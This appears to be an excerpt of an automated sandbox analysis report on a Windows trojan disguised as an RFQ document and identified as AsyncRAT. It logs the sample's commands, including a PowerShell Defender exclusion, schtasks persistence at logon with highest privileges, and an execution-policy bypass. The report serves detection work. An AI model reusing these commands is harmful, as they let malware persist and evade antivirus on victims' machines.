                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\dlliok.exe C:\Users\user\AppData\Local\Temp\dlliok.exe 0
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\mozille.exe "C:\Users\user\AppData\Local\Temp\mozille.exe"
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmpCDE7.tmp
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile created: C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exeJump to behavior
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile created: C:\Users\user\AppData\Local\Temp\tmp71CD.tmpJump to behavior
                  Source: classification engineClassification label: mal100.troj.evad.winEXE@53/16@0/1
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpBinary or memory string: INSERT INTO [content] ([active], [activate], [expire], [dayparts], [contentType], [descriptor], [size], [viewcount], [viewlimit], [displayafter], [props], [data]) VALUES (@active, @activate, @expire, @dayparts, @contentType, @descriptor, @size, @viewcount, @viewlimit, @displayafter, @props, @data); SELECT last_insert_rowid() AS contentId;
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5800:120:WilError_01
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_6SI8OkPnk
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5852:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6276:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6100:120:WilError_01
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 0.0.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.1.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.2.RFQ_GGMC-Ref 12-01-2022.exe.160000.0.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.2.unpack, WXX/jXQ.csCryptographic APIs: 'CreateDecryptor'
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                  Source: RFQ_GGMC-Ref 12-01-2022.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: IDescriptionMetadataEnt.pdb source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp

                  Data Obfuscation:

                  barindex
                  Yara detected Costura Assembly LoaderShow sources
                  Source: Yara matchFile source: 00000015.00000002.582533114.0000000007400000.00000004.00020000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.571994209.00000000031E3000.00000004.00000001.sdmp, type: MEMORY
                  Suspicious powershell command line foundShow sources
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\jzhlgt.exe"'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\dlliok.exe"'
                  .NET source code contains potential unpackerShow sources
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, sO/j4.cs.Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, sO/j4.cs.Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, sO/j4.cs.Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.1.unpack, sO/j4.cs.Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.2.RFQ_GGMC-Ref 12-01-2022.exe.160000.0.unpack, sO/j4.cs.Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.2.unpack, sO/j4.cs.Net Code: gNn System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  .NET source code contains method to dynamically call methods (often used by packers)Show sources
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, WXX/jXQ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  Source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  Source: 0.0.RFQ_GGMC-Ref 12-01-2022.exe.390000.0.unpack, WXX/jXQ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.1.unpack, WXX/jXQ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  Source: 5.2.RFQ_GGMC-Ref 12-01-2022.exe.160000.0.unpack, WXX/jXQ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  Source: 5.0.RFQ_GGMC-Ref 12-01-2022.exe.160000.2.unpack, WXX/jXQ.cs.Net Code: stackVariable1.GetMethod("GetDelegateForFunctionPointer", V_0)
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeCode function: 0_2_00A3C910 pushad ; retf
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeCode function: 0_2_00A3F572 pushad ; retf
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_00C1C910 pushad ; retf
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_00C1F572 pushad ; retf
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_04F84E40 push esp; retf
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_04F81778 push eax; mov dword ptr [esp], ecx
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 14_2_04F81768 push eax; mov dword ptr [esp], ecx
                  Source: C:\Users\user\AppData\Local\Temp\mozille.exeCode function: 15_2_01A0C910 pushad ; retf
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.64899477975
                  Source: initial sampleStatic PE information: section name: .text entropy: 7.64899477975
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile created: C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exeJump to dropped file
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeFile created: C:\Users\user\AppData\Local\Temp\mozille.exeJump to dropped file

                  Boot Survival:

                  barindex
                  Yara detected AsyncRATShow sources
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
                  Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
